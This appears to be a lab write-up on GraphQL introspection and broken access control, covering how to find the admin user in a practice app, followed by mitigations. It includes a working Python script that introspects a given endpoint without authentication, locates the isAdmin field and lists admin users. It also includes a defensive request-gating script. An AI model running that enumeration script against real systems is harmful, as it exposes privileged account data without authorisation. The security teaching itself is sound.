Exploring A01: Broken Access Control – GraphQL Introspection Misconfiguration

While working through A01: Broken Access Control from the OWASP Top 10, I came across an interesting misconfiguration involving GraphQL introspection.

Objective:

Using the GraphQL introspection feature, discover the user that has the “isAdmin” privilege.

Background

By default, GraphQL provides no built-in authentication or authorization, so developers must implement access controls themselves, typically in each resolver. If that is not done correctly, attackers can run unrestricted queries and read sensitive data. Introspection on its own only reveals the schema; the access-control failure in this lab is that the query it reveals can then be executed by any client that can reach the endpoint, and it returns a sensitive field.

Reconnaissance 

Upon visiting the application URL, I found several posts published by two users, which hinted that user data was accessible through GraphQL queries.


Exploitation 

To better understand the backend structure, I used the GraphiQL interface to explore the available queries.
Accessing the endpoint at http://0.0.0.0:5000/graphql (the lab URL) gives a console to send queries to the backend and discover what is available.

I queried the generic __schema using:


The response lists some interesting types. Let's explore the User object type: with a more specific introspection query we can ask for every field it exposes. Let's send the following:



We can see that there is an interesting field, isAdmin, which we can use to find out who the admin of the application is.

Now we just need to query all the users. To do that, let's check whether such a query is available. We can use the following syntax:


That gives us the allUsers query. Now we need to understand its fields. We can do that in different ways: through the GraphiQL documentation explorer, or with more introspection. In this case we use GraphiQL, sending the following query:


Finally, we found the user that is the admin, which was the scope of the lab.
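The four steps above (generic __schema query, field listing for the User type, locating the root query that returns it, then fetching allUsers and filtering on isAdmin), put together as one script. This is an added example, not the lab's code and not the queries from the screenshots. It assumes a GraphQL endpoint such as the lab's http://0.0.0.0:5000/graphql; SAMPLE_SCHEMA and SAMPLE_USERS are constructed by hand to mirror the shape the lab returns (usernames invented) so the walk runs offline, and the function and variable names are this example's own.

```python
"""Introspection walk from the write-up, end to end: find the type carrying
isAdmin, the root query that returns it, then fetch and filter the rows.
Added example, not the lab's code; assumes an endpoint like the lab's
http://0.0.0.0:5000/graphql. SAMPLE_* below are constructed, not captured."""
import json
import sys
import urllib.request

# Step 1: generic __schema query. The ofType nesting is needed to see through
# NON_NULL / LIST wrappers to the named type.
SCHEMA_QUERY = """{ __schema { queryType { name } types { name kind fields { name
  type { name kind ofType { name kind ofType { name kind ofType { name kind } } } } } } } }"""


def post_graphql(endpoint, query):
    """POST the query as JSON (no auth header: that is the point of the lab)."""
    req = urllib.request.Request(endpoint, data=json.dumps({"query": query}).encode(),
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


def named(ref):
    """Follow NON_NULL / LIST wrappers down to the innermost named type ref."""
    while ref.get("ofType"):
        ref = ref["ofType"]
    return ref


def type_by_name(schema, name):
    return next(t for t in schema["types"] if t["name"] == name)


def types_with_field(schema, field_name):
    """Step 2: user-defined object types exposing a field with this name."""
    return [t["name"] for t in schema["types"]
            if t["kind"] == "OBJECT" and not t["name"].startswith("__")
            and any(f["name"] == field_name for f in t.get("fields") or [])]


def queries_returning(schema, type_name):
    """Step 3: root query fields whose unwrapped return type is type_name."""
    root = type_by_name(schema, schema["queryType"]["name"])
    return [f["name"] for f in root["fields"] if named(f["type"])["name"] == type_name]


def scalar_fields(schema, type_name):
    """Leaf fields: selectable without a nested selection set."""
    return [f["name"] for f in type_by_name(schema, type_name)["fields"]
            if named(f["type"])["kind"] in ("SCALAR", "ENUM")]


def discover(schema, flag="isAdmin"):
    """(type, root query, leaf fields) for the first reachable type with `flag`, else None."""
    for type_name in types_with_field(schema, flag):
        for query_name in queries_returning(schema, type_name):
            return type_name, query_name, scalar_fields(schema, type_name)
    return None


def build_query(query_name, fields):
    return "{ %s { %s } }" % (query_name, " ".join(fields))


def find_admins(response, query_name, flag="isAdmin"):
    """Step 4: rows in the data response where the privilege flag is true."""
    rows = response["data"][query_name]
    return [r for r in (rows if isinstance(rows, list) else [rows]) if r.get(flag) is True]


def _ref(name, kind, of=None):
    return {"name": name, "kind": kind, "ofType": of}


# Constructed sample mirroring the lab's shape (usernames invented).
SAMPLE_SCHEMA = {"queryType": {"name": "Query"}, "types": [
    {"name": "Query", "kind": "OBJECT", "fields": [
        {"name": "allUsers", "type": _ref(None, "LIST", _ref("User", "OBJECT"))},
        {"name": "allPosts", "type": _ref(None, "LIST", _ref("Post", "OBJECT"))}]},
    {"name": "User", "kind": "OBJECT", "fields": [
        {"name": "id", "type": _ref(None, "NON_NULL", _ref("ID", "SCALAR"))},
        {"name": "username", "type": _ref("String", "SCALAR")},
        {"name": "isAdmin", "type": _ref("Boolean", "SCALAR")},
        {"name": "posts", "type": _ref(None, "LIST", _ref("Post", "OBJECT"))}]},
    {"name": "Post", "kind": "OBJECT", "fields": [
        {"name": "title", "type": _ref("String", "SCALAR")},
        {"name": "author", "type": _ref("User", "OBJECT")}]},
    {"name": "String", "kind": "SCALAR", "fields": None}]}
SAMPLE_USERS = {"data": {"allUsers": [{"id": "1", "username": "user_a", "isAdmin": False},
                                      {"id": "2", "username": "user_b", "isAdmin": True}]}}


def main(endpoint=None):
    """Live against `endpoint`, or offline against the sample data. Returns the admin rows."""
    schema = post_graphql(endpoint, SCHEMA_QUERY)["data"]["__schema"] if endpoint else SAMPLE_SCHEMA
    hit = discover(schema)
    if hit is None:
        return []
    type_name, query_name, fields = hit
    query = build_query(query_name, fields)
    print("%s.isAdmin reachable via %s" % (type_name, query))
    admins = find_admins(post_graphql(endpoint, query) if endpoint else SAMPLE_USERS, query_name)
    print("admins:", admins)
    return admins


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else None)
```

Run it with the endpoint URL as the only argument to go live; with no argument it walks the constructed sample. The walk stops at the first root query that returns the type carrying isAdmin; if that query takes arguments (a single user(id:) lookup rather than a list), add them in build_query. The requests carry no session or token on purpose: the finding is that the data comes back anyway.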

Conclusion

This exercise shows how an exposed introspection endpoint, combined with missing authorization on the queries it reveals, leaks sensitive application data.
Disabling introspection in production takes away the map; strict authentication and authorization checks on every query, and on sensitive fields such as isAdmin, remove the leak itself. Both are needed to prevent data exposure through GraphQL endpoints.

🔒 Key Takeaways

  • Disable introspection in production. Treat it as hardening, not access control: field names can still be guessed or recovered from client-side code.

  • Implement authentication and authorization for all queries, and enforce them per field for sensitive data such as isAdmin.

  • Use schema whitelisting (allowlisted or persisted queries, and per-role field allowlists) to limit the exposed surface.

  • Regularly perform security testing on APIs, including GraphQL-specific checks for introspection and unauthorized field access.
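The two controls the conclusion and the takeaways call for (introspection off in production, and per-role field authorization) as a request gate. This is an added example, not the lab's code and not any framework's API. It is deliberately framework-agnostic: in a real deployment the introspection switch belongs in the server's validation rules (for example graphene 3's graphene.validation.DisableIntrospection, or Apollo Server's introspection option) and the field check belongs in each resolver, where the parent type and the caller are known. FIELD_ALLOWLIST, the role names and the regex-based field extractor are this example's own constructions; the extractor is a simple stand-in for a real parser and fails closed.

```python
"""Request gate for the two mitigations: introspection off in production and a
per-role field allowlist. Added example, framework-agnostic on purpose; the
allowlist and the regex tokenizer are constructed for illustration."""
import re

INTROSPECTION_ENABLED = False  # production value; True only in development

# Constructed allowlist: per role, the fields that may be selected on each type.
# isAdmin is reachable only by admins.
FIELD_ALLOWLIST = {
    "anonymous": {"Query": {"allPosts"}, "Post": {"title", "author"}, "User": {"username"}},
    "user": {"Query": {"allPosts", "allUsers"}, "Post": {"title", "author"},
             "User": {"username", "posts"}},
    "admin": {"Query": {"allPosts", "allUsers"}, "Post": {"title", "author"},
              "User": {"username", "posts", "isAdmin"}},
}
KEYWORDS = {"query", "mutation", "subscription", "fragment", "on", "true", "false", "null"}
INTROSPECTION_FIELDS = {"__schema", "__type"}


def requested_fields(query):
    """Field names selected anywhere in the document, with comments, string literals,
    argument lists, aliases, operation names and fragment headers stripped out.
    Fragment spread names and directive names are left in, so the allowlist denies
    them: the fail-closed choice for a stand-in tokenizer."""
    text = re.sub(r"#[^\n]*", "", query)                                    # comments
    text = re.sub(r'"""[\s\S]*?"""|"(?:\\.|[^"\\])*"', '""', text)          # string literals
    while True:                                                              # (nested) argument lists
        text, n = re.subn(r"\([^()]*\)", "", text)
        if not n:
            break
    text = re.sub(r"\b(query|mutation|subscription)\s+[_A-Za-z]\w*", "", text)  # operation names
    text = re.sub(r"\bfragment\s+[_A-Za-z]\w*\s+on\s+[_A-Za-z]\w*", "", text)    # fragment headers
    names = re.findall(r"\b([_A-Za-z][_0-9A-Za-z]*)\b(?!\s*:)", text)       # `alias:` excluded
    return {n for n in names if n not in KEYWORDS}


def authorize(query, role, introspection_enabled=INTROSPECTION_ENABLED):
    """Decide whether `role` may run `query`. Returns (allowed, reason)."""
    fields = requested_fields(query)
    if fields & INTROSPECTION_FIELDS:
        if not introspection_enabled:
            return False, "introspection disabled"
        # Development only: the meta-schema's own field names are not in the allowlist.
        return True, "introspection permitted (non-production)"
    allowed = set().union(*FIELD_ALLOWLIST.get(role, {}).values()) | {"__typename"}
    denied = sorted(fields - allowed)
    if denied:
        return False, "fields not permitted for role %s: %s" % (role, ", ".join(denied))
    return True, "ok"


if __name__ == "__main__":
    for role, q in [("anonymous", "{ __schema { types { name } } }"),
                    ("user", "{ allUsers { username isAdmin } }"),
                    ("admin", "{ allUsers { username isAdmin } }")]:
        print(role, "->", authorize(q, role))
```

The allowlist check is flattened across types (a union of field names per role), so it cannot tell User.name from Post.name; that is why the production version of this check lives in the resolver for each field rather than in front of the parser. The introspection switch, by contrast, is cheap to keep at the edge as well as in the server's validation rules, and an unknown role falls through to an empty allowlist, which denies everything except __typename.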



